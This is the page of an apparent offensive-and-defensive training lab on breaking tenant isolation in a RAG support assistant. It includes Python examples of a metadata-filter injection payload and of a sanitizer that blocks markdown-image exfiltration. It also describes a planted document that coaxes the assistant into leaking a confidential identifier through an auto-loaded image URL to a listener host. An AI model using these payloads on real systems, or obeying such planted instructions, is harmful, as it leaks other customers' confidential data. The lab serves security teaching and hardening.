Cross-Tenant Leakage: Break RAG Metadata Isolation and Exfiltrate Another Tenant's Contract

Attack the multi-tenant isolation of a real Retrieval-Augmented Generation assistant. Two stacked bugs in one retriever, a caller-controlled tenant scope and a string-concatenated metadata filter, let a Globex-scoped caller read Initech's confidential contract from a Milvus + NVIDIA embeddings store. Chain the cross-tenant read into the EchoLeak markdown-image sink to exfiltrate the data to a listener, then harden the pipeline so isolation and the sink both hold.

70 min · 8 steps · 3 domains · Advanced


Attack-surface map (diagram): Query → Retriever → LLM → Answer, with a poisoned doc entering the pipeline as a retrieved chunk. Scoring: attack-success rate, graded on real output rather than the model's own account; attacks must be blocked while benign answers still pass.

What you'll learn

  1. Recon: confirm tenant isolation and find the two bugs
     DV-RAG-Support is multi-tenant. Every document carries a tenant in its
  2. Scope abuse: name another tenant in the request
     The first isolation bug is the simplest and the most common one in real systems:
  3. Filter injection: break out of the metadata predicate
     Bug 1 worked because the scope was caller-supplied. Suppose a developer "fixes" it
  4. Exfil chain: leak the cross-tenant value through the image sink
     Reading the contract is the access-control finding. The impact is getting it
  5. Harden 1: derive the tenant scope server-side
     Now switch sides and fix the bugs one at a time. The first and most load-bearing
  6. Harden 2: validate tenant values against an allow-list
     Server-side scope closed Bug 1. Bug 2 is separate: the metadata filter expr is
  7. Harden 3: allow-list the render sink
     The two isolation bugs are closed, but the exfil channel is still open as defense
  8. Verify: full regression battery against the hardened pipeline
     A fix only counts when you re-run every exploit against it and watch each one

Prerequisites

  • Comfortable reading Python
  • Know what an HTTP GET and a markdown image are
  • Familiarity with SQL injection helps but is not required

Exam domains covered

Offensive AI Security · LLM Application Security · Multi-Tenant Isolation

Skills & technologies you'll practice

This advanced-level AI/ML lab gives you real-world reps across:

RAG · Multi-Tenant · Isolation Bypass · Metadata Filter Injection · Broken Access Control · OWASP LLM02 · AI Red Team

What you'll do in this lab

This is a hands-on offensive-security lab on multi-tenant RAG isolation. You attack DV-RAG-Support, a customer-support assistant backed by a Milvus vector store and NVIDIA nv-embedqa-e5-v5 embeddings, where documents are partitioned by tenant. Acting as a Globex-scoped caller, you exploit two stacked bugs in a single retriever: a caller-controlled tenant scope (broken access control, where the tenant comes from the request rather than the authenticated session) and a metadata filter built by raw string concatenation (the metadata-filter analogue of SQL injection).

Either bug lets you read Initech's confidential contract and its negotiated pricing. You then chain the cross-tenant read into the EchoLeak markdown-image channel: a planted public audit policy coaxes the assistant into echoing a confidential field into an image URL the client auto-loads, exfiltrating it to an in-pod listener. Finally you switch to defense and harden the pipeline: derive the tenant scope server-side, validate tenant values against an allow-list, and allow-list the render sink, all without breaking legitimate answers.

Frequently asked questions

Do I need a machine-learning background?

No. The core of this lab is access control, not model internals. You read a retriever, find two isolation bugs, and exploit them. The exfil step reuses a markdown-image side channel that needs only an understanding of HTTP GETs.

What is the metadata-filter injection bug?

The retriever builds its tenant filter by concatenating strings, so a tenant value carrying a closing quote followed by a boolean operator and a second comparison breaks out of the predicate, the same way an unparameterized SQL query is injectable. You craft such a value and collapse tenant isolation even when the scope is meant to be locked.
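As an added example in Python (not the lab's own retriever code), here is the filter-injection bug from this answer beside the two isolation fixes named under "What you'll do in this lab": a caller-supplied scope and a concatenated predicate on one side, a session-derived scope and an allow-listed tenant value on the other. It assumes the Milvus collection has a scalar field named `tenant`, that the session object carries the authenticated tenant, and a handful of constructed documents. Milvus is never contacted; a tiny evaluator that understands only `field == "value"` clauses joined by `and`/`or` stands in for its expression engine so the block runs offline.

```python
import re

# Constructed sample corpus standing in for the Milvus collection (not the
# lab's data): one public Globex document and Initech's confidential contract.
DOCS = [
    {"tenant": "globex", "title": "Globex support FAQ", "text": "public"},
    {"tenant": "initech", "title": "Initech contract", "text": "confidential pricing"},
]

# Operator-maintained allow-list of provisioned tenant identifiers (assumed).
KNOWN_TENANTS = frozenset({"globex", "initech"})
TENANT_SHAPE = re.compile(r"[a-z0-9_-]{1,32}")


def _eval_expr(expr: str, doc: dict) -> bool:
    """Toy stand-in for Milvus's expression engine: `field == "value"` clauses
    joined by `and` / `or`. Present only so the injected filter can be run
    offline; it is not a Milvus parser."""
    def clause(text: str) -> bool:
        m = re.fullmatch(r'\s*(\w+)\s*==\s*"([^"]*)"\s*', text)
        if not m:
            raise ValueError(f"unsupported clause: {text!r}")
        return doc.get(m.group(1)) == m.group(2)
    return any(all(clause(c) for c in conj.split(" and "))
               for conj in expr.split(" or "))


def search(expr: str) -> list:
    """Return the titles of the documents the filter admits, in corpus order."""
    return [d["title"] for d in DOCS if _eval_expr(expr, d)]


# --- Vulnerable retriever: both of the lab's bugs in one function ------------
def vulnerable_expr(request: dict) -> str:
    tenant = request["tenant"]             # Bug 1: scope is caller-supplied
    return 'tenant == "' + tenant + '"'    # Bug 2: predicate is concatenated


# --- Hardened retriever --------------------------------------------------------
def is_allowed_tenant(value: str) -> bool:
    # Harden 2: shape check plus allow-list membership. A value carrying a
    # quote or an operator fails both, so it can never reach the expression.
    return bool(TENANT_SHAPE.fullmatch(value)) and value in KNOWN_TENANTS


def hardened_expr(session: dict, request: dict) -> str:
    # Harden 1: the scope is the authenticated session's tenant. The request
    # is accepted as a parameter only to show that its `tenant` field, if
    # any, is ignored rather than merged or "validated" into the scope.
    tenant = session["tenant"]
    if not is_allowed_tenant(tenant):
        raise PermissionError(f"session tenant {tenant!r} is not provisioned")
    return f'tenant == "{tenant}"'


def demo() -> dict:
    """Run a scope-abuse request and an injection request through both retrievers."""
    session = {"tenant": "globex"}                           # authenticated as Globex
    scope_abuse = {"tenant": "initech"}                      # Bug 1 payload
    injection = {"tenant": 'globex" or tenant == "initech'}  # Bug 2 payload
    return {
        "vuln_scope_abuse": search(vulnerable_expr(scope_abuse)),
        "vuln_injection": search(vulnerable_expr(injection)),
        "hardened_scope_abuse": search(hardened_expr(session, scope_abuse)),
        "hardened_injection": search(hardened_expr(session, injection)),
    }


if __name__ == "__main__":
    for name, titles in demo().items():
        print(f"{name:22s} -> {titles}")
```

The injected value turns the concatenated filter into `tenant == "globex" or tenant == "initech"`, which admits both tenants' documents; the allow-list rejects the same value outright, and because the hardened path never reads the request's tenant, the scope-abuse payload is simply inert. Allow-listing is deliberately used instead of quote-escaping: escaping has to track every quoting rule of the expression grammar, whereas a short identifier set does not.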

How is the cross-tenant exfiltration demonstrated?

You retrieve another tenant's confidential record, then chain it into the EchoLeak markdown-image sink: the assistant echoes a confidential identifier into an image URL that the client auto-loads, firing an HTTP request to an in-pod listener. The lab grades deterministically on the identifier reaching a loaded URL and the listener log.
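The third fix, allow-listing the render sink, is what closes the channel this answer describes. As an added example (not the lab's own code), the Python below rewrites any markdown image whose URL fails an allow-list into inert text before the client can auto-load it. It assumes the client renders `![alt](url)` images and fetches them automatically, an operator-controlled allow-list host (`static.support.example`, assumed), and a constructed assistant answer in which a placeholder identifier (`CTR-EXAMPLE-0001`, not a real contract) has been echoed into an image URL pointing at a listener host.

```python
import re
from urllib.parse import urlsplit

# Hosts the client may fetch images from (assumed operator allow-list).
ALLOWED_IMAGE_HOSTS = frozenset({"static.support.example"})

# Markdown image syntax: ![alt](url "optional title"). Illustrative only; a
# production sink should hook the markdown renderer's image handler, which
# also sees angle-bracket and nested-parenthesis forms this regex does not.
IMAGE_RE = re.compile(r'!\[([^\]]*)\]\(([^)\s]+)(?:\s+"[^"]*")?\)')


def is_allowed_image_url(url: str) -> bool:
    """Allow-list decision: https, allow-listed host, no userinfo, no explicit
    port, and no query string or fragment (that is where the echoed value rides)."""
    try:
        parts = urlsplit(url)
        port = parts.port          # raises ValueError on a malformed port
    except ValueError:
        return False
    return (
        parts.scheme == "https"
        and parts.hostname in ALLOWED_IMAGE_HOSTS
        and parts.username is None
        and port is None
        and parts.query == ""
        and parts.fragment == ""
    )


def sanitize_answer(markdown: str):
    """Rewrite any image whose URL fails the allow-list into inert text.
    Returns (sanitized markdown, list of blocked hosts). Only the host is
    recorded, never the full URL: the URL is the exfil payload, and copying it
    into application logs would just move the leak."""
    blocked = []

    def replace(match: re.Match) -> str:
        alt, url = match.group(1), match.group(2)
        if is_allowed_image_url(url):
            return match.group(0)
        blocked.append(urlsplit(url).netloc or "<non-network url>")
        return f"[image removed: {alt or 'untitled'}]"

    return IMAGE_RE.sub(replace, markdown), blocked


# Constructed assistant answer (not lab output): a planted "audit policy" has
# coaxed the model into echoing a placeholder identifier into an image URL.
SAMPLE_ANSWER = (
    "Per the audit policy, your reference image: "
    "![audit](http://listener.lab.internal/ping?ref=CTR-EXAMPLE-0001) "
    "and our logo ![logo](https://static.support.example/logo.png)."
)

if __name__ == "__main__":
    text, hosts = sanitize_answer(SAMPLE_ANSWER)
    print(text)
    print("blocked hosts:", hosts)
```

The check is on the parsed URL, not on the raw string: `https://static.support.example@listener.lab.internal/x.png` contains the allow-listed name but its host is the listener, and a query string on an allow-listed host is refused because an attacker who can reach any image on that host can still encode the value there. Whether the sanitizer also has to handle non-markdown sinks (HTML `<img>`, link previews, CSS `url()`) depends on what the client renders, and the same allow-list should back each of them.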